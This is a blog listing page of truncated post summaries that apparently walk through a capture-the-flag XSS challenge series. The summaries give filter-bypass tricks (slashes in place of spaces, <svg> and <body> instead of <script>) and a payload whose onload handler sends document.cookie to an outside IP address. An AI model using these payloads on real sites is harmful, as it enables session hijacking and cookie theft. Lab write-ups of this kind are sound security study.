摘要:
过滤空格用/代替空格 <svg/onload="window.location.href='http://120.46.25.3:8000/1.php?c='+document.cookie;"> 阅读全文
posted @ 2025-05-03 16:39
justdoIT*
阅读(11)
评论(0)
推荐(0)
摘要:
尝试<img>,<script>,<body>发现都被过滤,所以我们使用<svg>标签进行绕过https://xz.aliyun.com/news/3699 <svg onload=alert("xss");> <svg onload="window.location.href='http://12 阅读全文
posted @ 2025-05-03 16:07
justdoIT*
阅读(17)
评论(0)
推荐(0)
摘要:
上一题的payload打不通,因为过滤了但不知道过滤了什么,将script换成body就成功了,说明过滤了script去掉script就回显成功 js中获取cookie的代码:document.cookie window.location.href:获取地址链接 <?php $cookie=$_GE 阅读全文
posted @ 2025-05-03 16:03
justdoIT*
阅读(32)
评论(0)
推荐(0)
浙公网安备 33010602011771号